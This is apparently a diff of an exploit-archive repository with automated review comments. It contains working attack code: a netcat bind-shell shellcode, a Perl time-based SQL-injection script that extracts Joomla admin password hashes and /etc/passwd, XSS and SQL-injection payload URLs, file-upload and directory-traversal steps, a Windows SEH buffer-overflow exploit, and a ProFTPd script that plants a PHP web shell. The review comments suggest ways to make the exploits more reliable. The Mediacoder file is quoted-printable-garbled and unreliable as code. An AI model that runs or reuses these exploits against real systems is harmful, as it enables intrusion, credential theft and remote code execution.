# Shellcode Author: Oleg Boytsev
|
||||
# Tested on: Debian GNU/Linux 7/i686
|
||||
# Shellcode Length: 58
|
||||
# Command: gcc -m32 -z execstack x86_Linux_netcat_shellcode.c -o x86_Linux_netcat_shellcode
|
||||
|
||||
global _start
|
||||
section .text
|
||||
_start:
|
||||
xor eax, eax
|
||||
xor edx, edx
|
||||
push eax
|
||||
push 0x31373737 ;-vp17771
|
||||
push 0x3170762d
|
||||
mov esi, esp
|
||||
|
||||
push eax
|
||||
push 0x68732f2f ;-le//bin//sh
|
||||
push 0x6e69622f
|
||||
push 0x2f656c2d
|
||||
mov edi, esp
|
||||
|
||||
push eax
|
||||
push 0x636e2f2f ;/bin//nc
|
||||
push 0x6e69622f
|
||||
mov ebx, esp
|
||||
|
||||
push edx
|
||||
push esi
|
||||
push edi
|
||||
push ebx
|
||||
mov ecx, esp
|
||||
mov al,11
|
||||
int 0x80
|
||||
*/
|
||||
|
||||
#include<stdio.h>
|
||||
#include<string.h>
|
||||
|
||||
unsigned char shellcode[] =
|
||||
"\x31\xc0\x31\xd2\x50\x68\x37\x37\x37\x31\x68\x2d\x76\x70\x31\x89\xe6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x52\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80";
|
||||
|
||||
main()
|
||||
{
|
||||
printf("Shellcode Length: %d\n",strlen(shellcode));
|
||||
int (*ret)() = (int(*)())shellcode;
|
||||
ret();
|
||||
}
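Review bot: The shellcode's success depends on `/bin/nc` being a netcat that accepts `-l -e <prog> -p <port>`; as far as I know netcat-openbsd, the default `nc` on many Debian-derived systems, has no `-e` and rejects `-p` together with `-l`, so the "Tested on: Debian GNU/Linux 7/i686" line at L1493 should name the netcat flavour (netcat-traditional), otherwise `execve` succeeds but no listener appears and the user gets no feedback. The argv the assembly builds is `["/bin//nc", "-le//bin//sh", "-vp17771"]` with a NULL envp (`edx` zeroed at L1516 and pushed at L1564), and the 58-byte, null-free claim checks out against the byte string at L1601. In the C harness, `main()` should be `int main(void)` and the length should be printed with `printf("Shellcode Length: %zu\n", strlen(shellcode));` since `strlen` returns `size_t`; note also that `-z execstack` (L1499) only makes the jump into the `.data` array work on kernels that still apply READ_IMPLIES_EXEC to the whole process, so placing `shellcode[]` in an executable section or calling `mprotect` on its page before `ret()` is the robust form.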
125
platforms/php/webapps/36913.pl
Executable file
@ -0,0 +1,125 @@
source: http://www.securityfocus.com/bid/52312/info
|
||||
|
||||
Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
#!/usr/bin/perl
|
||||
# Thu Mar 15 22:55:32 CET 2012 A. Ramos <aramosf()unsec.net>
|
||||
# www.securitybydefault.com
|
||||
# Joomla <2.5.1 time based sql injection - vuln by Colin Wong
|
||||
#
|
||||
# using sleep() and not benchmark(), change for < mysql 5.0.12
|
||||
#
|
||||
# 1.- Database name: database()
|
||||
# 2.- Users data table name: (change 'joomla' for database() result)
|
||||
# select table_name from information_schema.tables where table_schema = "joomla" and table_name like "%_users"
|
||||
# 3.- Admin password: (change zzz_users from previus sql query result)
|
||||
# select password from zzzz_users limit 1
|
||||
|
||||
|
||||
|
||||
use strict;
|
||||
use LWP::UserAgent;
|
||||
$| = 1;
|
||||
|
||||
|
||||
my $url = $ARGV[0];
|
||||
my $wtime = $ARGV[1];
|
||||
my $sql = $ARGV[2];
|
||||
|
||||
unless ($ARGV[2]) {
|
||||
print "$0 <url> <wait time> <sql>\n";
|
||||
print "\texamples:\n";
|
||||
print "\t get admin password:\n";
|
||||
print "\t\t$0 http://host/joomla/ 3 'database()'\n";
|
||||
print "\t\t$0 http://host/joomla/ 3 'select table_name from information_schema.tables where table_schema=\"joomla\" and table_name like \"%25_users\"\'\n";
|
||||
print "\t\t$0 http://host/joomla/ 3 'select password from zzzz_users limit 1'\n";
|
||||
print "\t get file /etc/passwd\n";
|
||||
print "\t\t$0 http://host/joomla/ 3 'load_file(\"/etc/passwd\")'\n";
|
||||
exit 1;
|
||||
}
|
||||
|
||||
my ($len,$sqldata);
|
||||
|
||||
my $ua = LWP::UserAgent->new;
|
||||
$ua->timeout(60);
|
||||
$ua->env_proxy;
|
||||
|
||||
my $stime = time();
|
||||
my $res = $ua->get($url);
|
||||
my $etime = time();
|
||||
my $regrtt = $etime - $stime;
|
||||
print "rtt: $regrtt secs\n";
|
||||
print "vuln?: ";
|
||||
|
||||
my $sleep = $regrtt + $wtime;
|
||||
$stime = time();
|
||||
$res = $ua->get($url."/index.php/404' union select sleep($sleep) union select '1");
|
||||
$etime = time();
|
||||
my $rtt = $etime - $stime;
|
||||
if ($rtt >= $regrtt + $wtime) { print "ok!\n"; } else { print "nope :(\n"; exit 1; }
|
||||
|
||||
|
||||
my $lenoflen;
|
||||
sub len {
|
||||
# length of length
|
||||
for (1..5) {
|
||||
my $sql=$_[0];
|
||||
$stime = time();
|
||||
$res = $ua->get($url."/index.php/404' union select if(length(length(($sql)))=$_,sleep($wtime),null) union select '1");
|
||||
$etime = time();
|
||||
my $rtt = $etime - $stime;
|
||||
if ($rtt >= $regrtt + $wtime) {
|
||||
$lenoflen = $_;
|
||||
last;
|
||||
}
|
||||
}
|
||||
for (1..$lenoflen) {
|
||||
my $ll;
|
||||
$ll=$_;
|
||||
for (0..9) {
|
||||
my $sql=$_[0];
|
||||
$stime = time();
|
||||
$res = $ua->get($url."/index.php/404' union select if(mid(length(($sql)),$ll,1)=$_,sleep($wtime),null) union select '1");
|
||||
$etime = time();
|
||||
my $rtt = $etime - $stime;
|
||||
if ($rtt >= $regrtt + $wtime) {
|
||||
$len .= $_;
|
||||
}
|
||||
}
|
||||
}
|
||||
return $len;
|
||||
|
||||
}
|
||||
|
||||
sub data {
|
||||
my $sql = $_[0];
|
||||
my $len = $_[1];
|
||||
my ($bit, $str, @byte);
|
||||
my $high = 128;
|
||||
|
||||
for (1..$len) {
|
||||
my $c=8;
|
||||
@byte="";
|
||||
my $a=$_;
|
||||
for ($bit=1;$bit<=$high;$bit*=2) {
|
||||
$stime = time();
|
||||
# select if((ord(mid((load_file("/etc/passwd")),1,1)) & 64)=0,sleep(2),null) union select '1';
|
||||
$res = $ua->get($url."/index.php/404' union select if((ord(mid(($sql),$a,1)) & $bit)=0,sleep($wtime),null) union select '1");
|
||||
$etime = time();
|
||||
my $rtt = $etime - $stime;
|
||||
if ($rtt >= $regrtt + $wtime) {
|
||||
$byte[$c]="0";
|
||||
} else { $byte[$c]="1"; }
|
||||
$c--;
|
||||
}
|
||||
$str = join("",@byte);
|
||||
print pack("B*","$str");
|
||||
}
|
||||
}
|
||||
|
||||
$len = len($sql);
|
||||
print "$sql length: $len\n";
|
||||
print "$sql data:\n\n";
|
||||
data($sql,$len);
|
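Review bot: `sub len` re-declares `my $sql=$_[0];` inside both loop bodies (the `for (1..5)` loop and the inner `for (0..9)` loop), shadowing the file-scope `$sql` on every iteration, whereas `sub data` binds its argument once at the top. Hoisting it to a single `my $sql = $_[0];` as the first statement of `sub len` and deleting the two inner declarations makes the two subs consistent and avoids the per-iteration rebinding. Relatedly, `$lenoflen` is declared at file scope just before the sub but is only written and read inside it, so declaring it inside `sub len` would keep its scope local.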
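--- a/platforms/php/webapps/36914.txt
+++ b/platforms/php/webapps/36914.txt
@@ -0,0 +1,61 @@
+source: http://www.securityfocus.com/bid/52319/info
+
+Fork CMS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
+
+Fork CMS 3.2.7 and 3.2.6 are vulnerable; other versions may also be affected.
+
+http://www.example.com/private/en/locale/edit?id=37&value="><script>alert("ZSL");</script>
+
+http://www.example.com/private/en/locale/edit?id=37&name="><script>alert("ZSL");</script>
+
+http://www.example.com/private/en/locale/edit?id=37&type[]="><script>alert("ZSL");</script>
+
+http://www.example.com/private/en/locale/edit?id=37&module="><script>alert("ZSL");</script>
+
+http://www.example.com/private/en/locale/edit?id=37&application="><script>alert("ZSL");</script>
+
+http://www.example.com/private/en/locale/edit?id=37&language[]="><script>alert("ZSL");</script>
+
+Parameter: form_token
+Method: POST
+
+- POST /private/en/authentication/?querystring=/private/en HTTP/1.1
+Content-Length: 134
+Content-Type: application/x-www-form-urlencoded
+Cookie: PHPSESSID=t275j7es7rj2078a25o4m27lt0; interface_language=s%3A2%3A%22en%22%3B; track=s%3A32%3A%22b8cab7d50fd32c5dd3506d0c88edb795%22%3B
+Host: localhost:80
+Connection: Keep-alive
+Accept-Encoding: gzip,deflate
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
+
+backend_email=&backend_password=&form=authenticationIndex&form_token="><script>alert("ZSL");</script>&login=Log%20in
+
+Parameters: position_1, position_2, position_3, position_4
+Method: POST
+
+- POST http://localhost/private/en/extensions/edit_theme_template?token=true&id=4 HTTP/1.1
+
+form=edit&form_token=d75161cf347e7b12f53df4cf4082f27a&theme=triton&file=home.tpl&label=Home&position_0=&type_0_0=0&position_1="><script>alert("ZSL");</script>&position_2=left&position_3=right&position_4=top&type_4_0=1&position_5=advertisement&format=%5B%2F%2Cadvertisement%2Cadvertisement%2Cadvertisement%5D%2C%0D%0A%5B%2F%2C%2F%2Ctop%2Ctop%5D%2C%0D%0A%5B%2F%2C%2F%2C%2F%2C%2F%5D%2C%0D%0A%5Bmain%2Cmain%2Cmain%2Cmain%5D%2C%0D%0A%5Bleft%2Cleft%2Cright%2Cright%5D
+
+Parameter: success_message
+Method: POST
+
+- POST http://localhost/private/en/form_builder/edit?token=true&id=1 HTTP/1.1
+
+form=edit&form_token=&id=1&name=Contact&method=database_email&inputField-email%5B%5D=jox@jox.com&addValue-email=&email=jox@jox.com&success_message="><script>alert("ZSL");</script>&identifier=contact-en
+
+Parameter: smtp_password
+Method: POST
+
+- POST http://localhost/private/en/settings/email HTTP/1.1
+
+form=settingsEmail&form_token=&mailer_type=mail&mailer_from_name=Fork+CMS&mailer_from_email=jox@jox.com&mailer_to_name=Fork+CMS&mailer_to_email=jox@jox.com&mailer_reply_to_name=Fork+CMS&mailer_reply_to_email=jox@jox.com&smtp_server=&smtp_port=&smtp_username=&smtp_password="><script>alert("ZSL");</script>
+
+Parameters: site_html_footer, site_html_header
+Method: POST
+
+- POST http://localhost/private/en/settings/index HTTP/1.1
+
+form=settingsIndex&form_token=&site_title=My+website&site_html_header=&site_html_footer="><script>alert("ZSL");</script>&time_format=H%3Ai&date_format_short=j.n.Y&date_format_long=l+j+F+Y&number_format=dot_nothing&fork_api_public_key=f697aac745257271d83bea80f965e3c1&fork_api_private_key=6111a761ec566d325a623e0dcaf614e2&akismet_key=&ckfinder_license_name=Fork+CMS&ckfinder_license_key=QJH2-32UV-6VRM-V6Y7-A91J-W26Z-3F8R&ckfinder_image_max_width=1600&ckfinder_image_max_height=1200&addValue-facebookAdminIds=&facebook_admin_ids=&facebook_application_id=&facebook_application_secret=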
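--- a/platforms/php/webapps/36916.txt
+++ b/platforms/php/webapps/36916.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52328/info
+
+Exponent CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Exponent CMS 2.0.4 is vulnerable; prior versions may also be affected.
+
+http://www.example.com//exponent/cron/send_reminders.php?src=src%3d11"%3b}'%20or%201%3d1%20AND%20SLEEP(5)%20%3b%20--%20"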
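--- a/platforms/php/webapps/36917.txt
+++ b/platforms/php/webapps/36917.txt
@@ -0,0 +1,43 @@
+source: http://www.securityfocus.com/bid/52336/info
+
+OSClass is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability.
+
+An attacker can exploit these issues to obtain sensitive information and to upload arbitrary code and run it in the context of the webserver process.
+
+OSClass 2.3.5 is vulnerable; prior versions may also be affected.
+
+Arbitrary File Upload Vulnerability:
+
+1. Take a php file and rename it .gif (not really needed since OSClass trusts mime type)
+
+2. Upload that file as picture for a new item and get its name (is 5_small.jpg)
+
+3. Change useragent of your browser to: "Mozilla/4.0 (compatible; MSIE 5.0" . (needed to disable gzip encoding in combine.php)
+
+4. Use combine.php to move itself to oc-content/uploads
+http://www.example.com/osclass/oc-content/themes/modern/combine.php?type=./../../uploads/combine.php&files=combine.php
+now we have a copy of combine.php placed into uploads dir (the same dir where our malicius php file has been uploaded)
+
+5. Use uploads/combine.php to move 5_original.php to /remote.php
+http://www.example.com/osclass/oc-content/uploads/combine.php?files=5_original.jpg&type=/../../remote.php
+
+
+6. Run the uploaded php file
+http://www.example.com/osclass/remote.php
+
+
+
+
+Directory Traversal Vulnerability:
+
+It is possible to download and arbitrary file (ie config.php) under the www root.
+
+1. Change useragent of your browser to: "Mozilla/4.0 (compatible; MSIE 5.0" . (needed to disable gzip encoding)
+
+2. Move combine.php into web root
+http://www.example.com/osclass/oc-content/themes/modern/combine.php?type=./../../../combine.php&files=combine.php
+
+3. Run combine to download config.php
+http://www.example.com/osclass/combine.php?files=config.php
+
+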
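--- a/platforms/windows/local/36920.py
+++ b/platforms/windows/local/36920.py
@@ -0,0 +1,50 @@
+#!/usr/bin/python
+# Exploit Title: Mediacoder 0.8.34.5716 Buffer Overflow SEH Exploit (.m3u)
+# Date: 05/May/2015
+# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
+# email: kwiha2003 [at ]yahoo [dot] com=20
+# Version: 0.8.34.5716
+# Tested on: Win XP3
+# Vendor: http://www.mediacoderhq.com/
+# Software link: http://www.mediacoderhq.com/getfile.htm?site=3Dmediacoder.=
+info&file=3DMediaCoder-0.8.34.5716.exe
+
+# Greetz: b33f,corelan,offsec,vulnhub,HUST510
+# Notes: Due to insifficient space after taking control of the EIP, you hav=
+e to jump backwards and also=20
+# avoid a few bad bytes after the "A"s.
+
+#!/usr/bin/python
+buffersize =3D 853
+buffer =3D ("http://" + "\x41" * 256)
+#Space for shellcode to decode
+buffer +=3D "\x90" * 24
+# msfpayload windows/exec CMD=3Dcalc R|msfencode -b "\x00\x0a\x0d\x20" -t c=
+-e x86/shikata_ga_nai
+#[*] x86/shikata_ga_nai succeeded with size 223 (iteration=3D1)
+#unsigned char buf[] =3D=20
+buffer +=3D("\xdd\xc1\xbd\xc4\x15\xfd\x3a\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
+"\x32\x31\x6f\x17\x03\x6f\x17\x83\x2b\xe9\x1f\xcf\x4f\xfa\x69"
+"\x30\xaf\xfb\x09\xb8\x4a\xca\x1b\xde\x1f\x7f\xac\x94\x4d\x8c"
+"\x47\xf8\x65\x07\x25\xd5\x8a\xa0\x80\x03\xa5\x31\x25\x8c\x69"
+"\xf1\x27\x70\x73\x26\x88\x49\xbc\x3b\xc9\x8e\xa0\xb4\x9b\x47"
+"\xaf\x67\x0c\xe3\xed\xbb\x2d\x23\x7a\x83\x55\x46\xbc\x70\xec"
+"\x49\xec\x29\x7b\x01\x14\x41\x23\xb2\x25\x86\x37\x8e\x6c\xa3"
+"\x8c\x64\x6f\x65\xdd\x85\x5e\x49\xb2\xbb\x6f\x44\xca\xfc\x57"
+"\xb7\xb9\xf6\xa4\x4a\xba\xcc\xd7\x90\x4f\xd1\x7f\x52\xf7\x31"
+"\x7e\xb7\x6e\xb1\x8c\x7c\xe4\x9d\x90\x83\x29\x96\xac\x08\xcc"
+"\x79\x25\x4a\xeb\x5d\x6e\x08\x92\xc4\xca\xff\xab\x17\xb2\xa0"
+"\x09\x53\x50\xb4\x28\x3e\x3e\x4b\xb8\x44\x07\x4b\xc2\x46\x27"
+"\x24\xf3\xcd\xa8\x33\x0c\x04\x8d\xcc\x46\x05\xa7\x44\x0f\xdf"
+"\xfa\x08\xb0\x35\x38\x35\x33\xbc\xc0\xc2\x2b\xb5\xc5\x8f\xeb"
+"\x25\xb7\x80\x99\x49\x64\xa0\x8b\x29\xeb\x32\x57\xae")
+buffer +=3D "\x42" * 350
+nseh =3D "\xEB\x06\x90\x90"
+# 0x660104ee : pop edi # pop ebp # ret | [libiconv-2.dll]=20
+seh=3D"\xee\x04\x01\x66"
+#Jump back 603 bytes due to insufficient space for shellcode
+jmpbck =3D "\xe9\xA5\xfd\xff\xff"
+junk =3D ("D" * 55)=20
+f=3D open("exploit.m3u",'w')
+f.write(buffer + nseh + seh + jmpbck + junk)
+f.close()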
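Review bot: The file as committed is still quoted-printable encoded and therefore is not valid Python: every assignment reads `buffersize =3D 853` / `buffer +=3D ...` where `=3D` stands for `=`, several lines end in a literal `=20`, and three lines are split by soft line breaks (the `# Software link:` comment, the `# Notes:` comment and the `# msfpayload` comment each continue on the next line after a bare trailing `=`). The entry should be decoded (for example with `python -m quopri -d`) before it is archived so that `buffersize = 853` and the remaining statements parse; the shebang is also duplicated, once at the top and again before the first assignment. Whether the hex-string payload lines survived the mail encoding byte-for-byte cannot be told from the rendered page and is worth re-checking against the author's original.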
|
@ -1,47 +0,0 @@
|
|||
# Title: ProFTPd 1.3.5 Remote Command Execution
|
||||
# Date : 20/04/2015
|
||||
# Author: R-73eN
|
||||
# Software: ProFTPd 1.3.5 with mod_copy
|
||||
# Tested : Kali Linux 1.06
|
||||
# CVE : 2015-3306
|
||||
# Greetz to Vadim Melihow for all the hard work .
|
||||
import socket
|
||||
import sys
|
||||
import requests
|
||||
#Banner
|
||||
banner = ""
|
||||
banner += " ___ __ ____ _ _ \n"
|
||||
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
|
||||
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
|
||||
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
|
||||
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
|
||||
print banner
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
if(len(sys.argv) < 4):
|
||||
print '\n Usage : exploit.py server directory cmd'
|
||||
else:
|
||||
server = sys.argv[1] #Vulnerable Server
|
||||
directory = sys.argv[2] # Path accessible from web .....
|
||||
cmd = sys.argv[3] #PHP payload to be executed
|
||||
evil = '<?php system("' + cmd + '") ?>'
|
||||
s.connect((server, 21))
|
||||
s.recv(1024)
|
||||
print '[ + ] Connected to server [ + ] \n'
|
||||
s.send('site cpfr /etc/passwd')
|
||||
s.recv(1024)
|
||||
s.send('site cpto ' + evil)
|
||||
s.recv(1024)
|
||||
s.send('site cpfr /proc/self/fd/3')
|
||||
s.recv(1024)
|
||||
s.send('site cpto ' + directory + 'infogen.php')
|
||||
s.recv(1024)
|
||||
s.close()
|
||||
print '[ + ] Payload sended [ + ]\n'
|
||||
print '[ + ] Executing Payload [ + ]\n'
|
||||
r = requests.get('http://' + server + '/infogen.php') #Executing PHP payload through HTTP
|
||||
if (r.status_code == 200):
|
||||
print '[ * ] Payload Executed Succesfully [ * ]'
|
||||
else:
|
||||
print ' [ - ] Error : ' + str(r.status_code) + ' [ - ]'
|
||||
|
||||
print '\n http://infogen.al/'
|
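--- a/platforms/windows/remote/36915.txt
+++ b/platforms/windows/remote/36915.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/52327/info
+
+NetDecision is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting the issues can allow an attacker to obtain sensitive information that could aid in further attacks.
+
+NetDecision 4.6.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com:8087/...\...\...\...\...\...\windows\system.ini
+http://www.example.com:8090/.../.../.../.../.../.../windows/system.ini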